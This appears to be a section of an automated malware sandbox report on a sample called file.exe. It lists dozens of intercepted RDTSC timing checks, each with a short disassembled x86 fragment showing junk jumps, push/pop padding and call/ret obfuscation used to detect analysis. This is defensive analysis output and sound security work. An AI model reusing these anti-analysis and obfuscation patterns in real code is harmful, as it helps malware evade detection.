                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF0F second address: DAEF8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30F498CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F3A30F498C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F3A30F498C8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 push 00000000h 0x00000043 mov esi, ecx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F3A30F498D8h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF8A second address: DAEF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEE0D second address: DAEE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF90 second address: DAEF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB003F second address: DB0043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB147F second address: DB1483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1483 second address: DB1489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6545 second address: DB655F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF95h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1C5A second address: DB1C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C1A second address: DB6C20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C20 second address: DB6C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9943 second address: DB99B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F3A30BBDF86h 0x00000009 ja 00007F3A30BBDF86h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jl 00007F3A30BBDF9Fh 0x00000019 jmp 00007F3A30BBDF99h 0x0000001e nop 0x0000001f or dword ptr [ebp+122D19D0h], esi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F3A30BBDF88h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 pushad 0x00000044 and edi, dword ptr [ebp+122D2B0Fh] 0x0000004a mov si, ax 0x0000004d popad 0x0000004e mov bl, DCh 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C26 second address: DB6C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C2A second address: DB6C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C2E second address: DB6C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A30F498D2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C4D second address: DB6C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBA15 second address: DBBA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D2h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3A30F498CDh 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F3A30F498CEh 0x00000019 jmp 00007F3A30F498D0h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC0D9 second address: DBC0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC0DF second address: DBC0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD04D second address: DBD052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC23F second address: DBC266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A30F498D6h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F3A30F498C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC266 second address: DBC287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBC287 second address: DBC32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F3A30F498C8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007F3A30F498D7h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e stc 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F3A30F498C8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D2675h], ebx 0x00000056 mov ebx, dword ptr [ebp+122D1860h] 0x0000005c mov eax, dword ptr [ebp+122D1529h] 0x00000062 or dword ptr [ebp+122D1C32h], edi 0x00000068 push FFFFFFFFh 0x0000006a jo 00007F3A30F498C9h 0x00000070 movsx edi, dx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 jnp 00007F3A30F498C6h 0x0000007d jp 00007F3A30F498C6h 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBDF9A second address: DBDF9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBDF9F second address: DBDFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A30F498D0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBDFB9 second address: DBE02E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30BBDF8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F3A30BBDF88h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 adc bx, BFF0h 0x0000002a mov di, ax 0x0000002d mov di, bx 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 jmp 00007F3A30BBDF92h 0x00000038 mov ebx, dword ptr [ebp+122D297Fh] 0x0000003e popad 0x0000003f push 00000000h 0x00000041 je 00007F3A30BBDF92h 0x00000047 jng 00007F3A30BBDF8Ch 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push ebx 0x00000051 pushad 0x00000052 popad 0x00000053 pop ebx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC27F2 second address: DC27F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC4B77 second address: DC4B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5CBC second address: DC5CC6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5CC6 second address: DC5CEF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A30BBDF9Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5CEF second address: DC5D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F3A30F498CCh 0x0000000b popad 0x0000000c nop 0x0000000d mov di, bx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F3A30F498C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push eax 0x0000002d pop ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F3A30F498C8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d jng 00007F3A30F498DCh 0x00000053 jmp 00007F3A30F498D6h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC6E3C second address: DC6E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC2A8D second address: DC2A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC3AE8 second address: DC3B03 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A30BBDF8Ch 0x00000008 jp 00007F3A30BBDF86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F3A30BBDF88h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC03C7 second address: DC03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC7F3E second address: DC7F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3A30BBDF86h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC708D second address: DC70B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A30F498CAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3A30F498D2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC8DF6 second address: DC8E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub bh, 00000071h 0x0000000f push 00000000h 0x00000011 sub ebx, 04C49483h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F3A30BBDF88h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov bx, BA9Bh 0x00000037 xchg eax, esi 0x00000038 jc 00007F3A30BBDF8Ah 0x0000003e push esi 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 pop esi 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 jmp 00007F3A30BBDF90h 0x0000004a jmp 00007F3A30BBDF94h 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F3A30BBDF8Fh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC8163 second address: DC8167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC906C second address: DC9071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DCD6EF second address: DCD6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D63594 second address: D6359D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6359D second address: D635A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D635A1 second address: D635BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A30BBDF90h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D635BD second address: D635DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3A30F498CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jbe 00007F3A30F498C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D635DB second address: D635DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD06BD second address: DD0717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A30F498CFh 0x00000008 jmp 00007F3A30F498D9h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jno 00007F3A30F498CAh 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3A30F498D4h 0x00000023 js 00007F3A30F498C6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0717 second address: DD071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD071D second address: DD0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0723 second address: DD0727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0727 second address: DD072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0849 second address: DD084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD084F second address: DD0868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3A30F498CCh 0x0000000a jo 00007F3A30F498D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD0868 second address: DD086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD9932 second address: DD9955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDDDC7 second address: DDDDE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDDF34 second address: DDDF3E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDDF3E second address: DDDF58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3A30BBDF94h 0x00000008 jmp 00007F3A30BBDF8Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDDF58 second address: DDDF69 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE09E second address: DDE0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE0A2 second address: DDE0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE0BE second address: DDE0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE0C4 second address: DDE0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE0CB second address: DDE0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F3A30BBDF86h 0x0000000b jmp 00007F3A30BBDF8Dh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE232 second address: DDE23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE547 second address: DDE566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30BBDF8Bh 0x00000009 jmp 00007F3A30BBDF90h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE566 second address: DDE56C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE6BC second address: DDE6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE6C0 second address: DDE6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE805 second address: DDE80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DDE80B second address: DDE811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4A50 second address: DE4A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF91h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4A67 second address: DE4A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4A6B second address: DE4A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3A30BBDF86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A30BBDF94h 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE3852 second address: DE3870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB580A second address: DB5823 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F3A30BBDF86h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jnl 00007F3A30BBDF86h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE3B17 second address: DE3B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3A30F498D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE3B31 second address: DE3B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F3A30BBDF8Eh 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE3CB4 second address: DE3CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4079 second address: DE407D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE407D second address: DE4098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30F498D1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4098 second address: DE409C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
